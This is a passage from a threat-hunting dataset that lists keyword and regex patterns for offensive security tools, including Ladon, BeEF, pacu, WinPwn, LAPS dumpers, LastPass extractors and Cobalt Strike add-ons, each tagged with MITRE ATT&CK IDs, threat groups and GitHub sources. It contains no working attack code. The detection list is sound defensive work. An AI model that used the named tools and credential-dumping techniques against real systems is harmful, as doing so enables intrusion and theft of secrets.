loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon40 BypassUAC*",".{0,1000}Ladon40\sBypassUAC.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon911*.ps1",".{0,1000}Ladon911.{0,1000}\.ps1","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon911.exe*",".{0,1000}Ladon911\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon911_*.rar*",".{0,1000}Ladon911_.{0,1000}\.rar.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*LadonExp.exe*",".{0,1000}LadonExp\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*LadonGUI.exe*",".{0,1000}LadonGUI\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*LadonLib.rar*",".{0,1000}LadonLib\.rar.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. 
loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Ladon-N20.exe*",".{0,1000}Ladon\-N20\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*Ladon-N40.exe*",".{0,1000}Ladon\-N40\.exe.{0,1000}","offensive_tool_keyword","viperc2","vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly 
used in the process of Intranet penetration","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/FunnyWolf/vipermsf","1","1","N/A","N/A","1","89","42","2024-04-21T05:49:15Z","2021-01-20T13:08:24Z" "*LadonStudy.exe*",".{0,1000}LadonStudy\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","1","N/A","10","10","4595","855","2023-12-19T15:05:38Z","2019-11-02T06:22:41Z" "*Lalin.sh *",".{0,1000}Lalin\.sh\s.{0,1000}","offensive_tool_keyword","LALIN","this script automatically install any package for pentest with uptodate tools . and lazy command for run the tools like lazynmap . 
install another and update to new","T1588","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/LALIN","1","0","N/A","N/A","4","354","164","2017-04-13T13:47:21Z","2016-06-10T07:53:49Z" "*lallousz-x86@yahoo.com*",".{0,1000}lallousz\-x86\@yahoo\.com.{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege Escalation","https://github.com/exploits-forsale/prefetch-tool","1","1","N/A","8","1","47","7","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z" "*lambda__backdoor_new_sec_groups*",".{0,1000}lambda__backdoor_new_sec_groups.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*lan_fingerprint_common.*",".{0,1000}lan_fingerprint_common\..{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*lan_ping_sweep.json*",".{0,1000}lan_ping_sweep\.json.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","0","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*lan_sw_port_scan.json*",".{0,1000}lan_sw_port_scan\.json.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*lanjelot*",".{0,1000}lanjelot.{0,1000}","offensive_tool_keyword","Github Username","github username. creator of patator and exploitation tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/lanjelot","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*LANs.py*",".{0,1000}LANs\.py.{0,1000}","offensive_tool_keyword","LANs.py","Automatically find the most active WLAN users then spy on one of them and/or inject arbitrary HTML/JS into pages they visit","T1538.001 - T1539.003 - T1040 - T1057 - T1134 - T1218 - T1053 - T1055 - T1059.001 - T1059.003","TA0007 - TA0006 - TA0003 - TA0002 - TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/DanMcInerney/LANs.py","1","1","N/A","N/A","10","2566","500","2021-07-31T21:33:37Z","2013-01-03T19:33:52Z" "*lanscan_arp.py*",".{0,1000}lanscan_arp\.py.{0,1000}","offensive_tool_keyword","red-python-scripts","random networking exploitation scripts","T1190 - T1046 - T1065","TA0001 - TA0007","N/A","N/A","Collection","https://github.com/davidbombal/red-python-scripts","1","0","N/A","8","10","1952","1596","2024-01-11T16:11:28Z","2021-01-07T16:11:52Z" "*laps_dump*",".{0,1000}laps_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*LapsAllowedAdminGroups.txt*",".{0,1000}LapsAllowedAdminGroups\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest 
AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*LAPSDecrypt.*",".{0,1000}LAPSDecrypt\..{0,1000}","offensive_tool_keyword","LAPSDecrypt","Quick POC looking at how encryption works for LAPS (v2)","T1552.004","TA0003","N/A","N/A","Credential Access","https://gist.github.com/xpn/23dc5b6c260a7571763ca8ca745c32f4","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*Lapsdump.cna*",".{0,1000}Lapsdump\.cna.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*Lapsdump.exe*",".{0,1000}Lapsdump\.exe.{0,1000}","offensive_tool_keyword","C2-Tool-Collection","A collection of tools which integrate with Cobalt Strike (and possibly other C2 frameworks) through BOF and reflective DLL loading techniques","T1055 - T1218 - T1059 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/outflanknl/C2-Tool-Collection","1","1","N/A","10","10","1052","180","2023-10-27T14:16:17Z","2022-04-22T13:43:35Z" "*LAPSDumper-main*",".{0,1000}LAPSDumper\-main.{0,1000}","offensive_tool_keyword","LAPSDumper","Dumping LAPS from Python","T1136.001 - T1112 - T1078.001","TA0002 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/n00py/LAPSDumper","1","1","N/A","10","3","238","35","2022-12-07T18:35:28Z","2020-12-19T05:15:10Z" "*LapsPasswords.txt*",".{0,1000}LapsPasswords\.txt.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - 
T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","3187","500","2024-01-29T13:11:05Z","2018-03-07T12:51:25Z" "*LAPSToolkit*",".{0,1000}LAPSToolkit.{0,1000}","offensive_tool_keyword","LAPSToolkit","Functions written in PowerShell that leverage PowerView to audit and attack Active Directory environments that have deployed Microsofts Local Administrator Password Solution (LAPS). It includes finding groups specifically delegated by sysadmins. finding users with All Extended Rights that can view passwords. and viewing all computers with LAPS enabled","T1087.001 - T1069 - T1069.003 - T1069.007 - T1069.002 - T1069.001","TA0007 - TA0008 - TA0009","N/A","N/A","Information Gathering","https://github.com/leoloobeek/LAPSToolkit","1","1","N/A","N/A","8","735","110","2018-01-31T14:45:35Z","2016-04-27T00:06:20Z" "*LAPSToolkit.ps1*",".{0,1000}LAPSToolkit\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*LaresLLC/SlinkyCat*",".{0,1000}LaresLLC\/SlinkyCat.{0,1000}","offensive_tool_keyword","SlinkyCat","This script performs a series of AD enumeration tasks","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/LaresLLC/SlinkyCat","1","1","AD Enumeration","7","1","73","5","2023-07-12T15:29:31Z","2023-07-03T23:44:18Z" "*LasCC/Hack-Tools*",".{0,1000}LasCC\/Hack\-Tools.{0,1000}","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web 
Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5452","618","2024-02-24T00:10:34Z","2020-06-22T21:42:16Z" "*lastpass.x86*",".{0,1000}lastpass\.x86.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*lastpass/process_lp_files.py*",".{0,1000}lastpass\/process_lp_files\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - 
T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","688","112","2024-04-02T14:36:01Z","2022-04-25T16:32:08Z" "*lastpass_sniffed_fmt_plug*",".{0,1000}lastpass_sniffed_fmt_plug.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*lastpass2john.py*",".{0,1000}lastpass2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*Lateral/DCom.cs*",".{0,1000}Lateral\/DCom\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Lateral/PSExec.cs*",".{0,1000}Lateral\/PSExec\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - 
T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Lateral/SMBClient.cs*",".{0,1000}Lateral\/SMBClient\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Lateral/SMBClientDelete.cs*",".{0,1000}Lateral\/SMBClientDelete\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Lateral/SMBClientGet.cs*",".{0,1000}Lateral\/SMBClientGet\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*Lateral/SMBClientPut.cs*",".{0,1000}Lateral\/SMBClientPut\.cs.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - 
